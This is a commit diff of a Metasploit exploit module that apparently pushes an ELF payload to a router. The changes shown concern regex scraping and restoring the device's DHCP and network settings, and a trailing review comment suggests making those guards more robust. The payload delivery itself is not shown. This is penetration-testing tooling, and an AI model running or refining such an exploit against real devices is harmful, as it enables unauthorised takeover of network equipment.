final regex, dhcp check and feedback from juan

bug/bundler_fix
m-1-k-3 2013-04-07 17:57:18 +02:00
parent 83e2f69faa
commit 9f89a996b2
1 changed files with 12 additions and 6 deletions


@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ]),
OptString.new('LAN_PROTO', [ true, 'The device configuration for the local network, dhcp or static (default: dhcp)', 'dhcp' ]),
], self.class)
end
def get_config(config, pattern)
if config =~ /#{pattern}/
#print_line("found: #{$1}") #debugging
return $1
end
return ""
@ -107,15 +107,20 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
end
#now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested!
@now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>")
if @now_proto_orig !~ /dhcp/
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
end
@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")
if @wan_proto_orig !~ /dhcp/
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
end
@lan_proto_orig = get_config(res.body, "<input\ type=\"radio\"\ name=\"lan_proto\"\ value=\"(.*)\"\ checked\ onClick=\"SelDHCP")
@daylight_time_orig = get_config(res.body, "<input\ type=hidden\ name=daylight_time\ value=(.*)>")
@lan_ipaddr_orig = get_config(res.body, "<input\ type=hidden\ name=\"lan_ipaddr\"\ value=(.*)>")
@wait_time_orig = get_config(res.body, "<input\ type=hidden\ name=\"wait_time\"\ value=(.*)>")
@need_reboot_orig = get_config(res.body, "<input\ type=hidden\ name=\"need_reboot\"\ value=(.*)>")
@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")
@lan_ipaddr_0_orig = get_config(res.body, "onBlur\=valid_range\\(this\,1\,223\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_0\"\>")
@lan_ipaddr_1_orig = get_config(res.body, "\<INPUT\ class=num\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_1\">")
@lan_ipaddr_2_orig = get_config(res.body, "\<INPUT\ class=num maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_2\">")
@ -132,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
@dhcp_num_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,1\,253\,\"Number%20of%20DHCP%20users\"\\)\;Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_num\"\ class=num><\/TD>")
@dhcp_start_orig = get_config(res.body, "Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_start\"\ class=num\ onChange=\"valid_dhcpd_start_ip\\(this.form\,\ this\\)\">")
@netmask_orig = get_config(res.body, "value=.*\ selected\>255\.255\.255\.(.*)\<\/OPTION\>")
@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)>")
@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)><INPUT\ maxLength=3")
@wan_dns0_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_0\"\ class=num\>")
@wan_dns0_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns0_1\"\ class=num\>")
@wan_dns0_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_2\"\ class=num\>")
@ -145,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
@wan_dns2_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns2_1\"\ class=num\>")
@wan_dns2_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_2\"\ class=num\>")
@wan_dns2_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_3\"\ class=num\>")
@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)>")
@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)><INPUT\ maxLength=3")
@wan_wins_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_0\"\ class=num>")
@wan_wins_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_1\"\ class=num>")
@wan_wins_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_2\"\ class=num>")
@ -199,7 +204,8 @@ class Metasploit3 < Msf::Exploit::Remote
'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s,
'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s,
'lan_netmask' => "255.255.255.#{@netmask_orig}",
'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
#'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
'lan_proto' => @lan_proto_orig.to_s,
'dhcp_check' => "1",
'dhcp_start' => @dhcp_start_orig.to_s,
'dhcp_num' => @dhcp_num_orig.to_s,
@ -243,7 +249,7 @@ class Metasploit3 < Msf::Exploit::Remote
rport = datastore['RPORT']
restore = datastore['RESTORE_CONF']
@timeout = 10
@lan_proto_manual = datastore['LAN_PROTO']
#@lan_proto_manual = datastore['LAN_PROTO']
#
# testing Login
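Review bot: The two new guards in the second hunk (`if @now_proto_orig !~ /dhcp/` and the same test on `@wan_proto_orig`) are substring matches against a greedy `(.*)` capture, so a value that merely contains "dhcp", or a capture that runs on to a later quote on the same line, still passes the check. Since the guard exists to avoid breaking the device, compare exactly with `unless @now_proto_orig == 'dhcp'` and consider `(.*?)` in those two patterns, assuming the page reports the bare string `dhcp`. `@lan_proto_orig` is now posted back as `'lan_proto' => @lan_proto_orig.to_s` without any guard, and `get_config` returns `""` on a miss, so I would add `fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device") if @lan_proto_orig.empty?` right after it is read. The `LAN_PROTO` option still appears in the options list in the first hunk while its only reader is commented out; if that line is kept, the option is dead and should be removed rather than left registered. The methods around these hunks start and end outside the visible lines, so this is based only on what is shown.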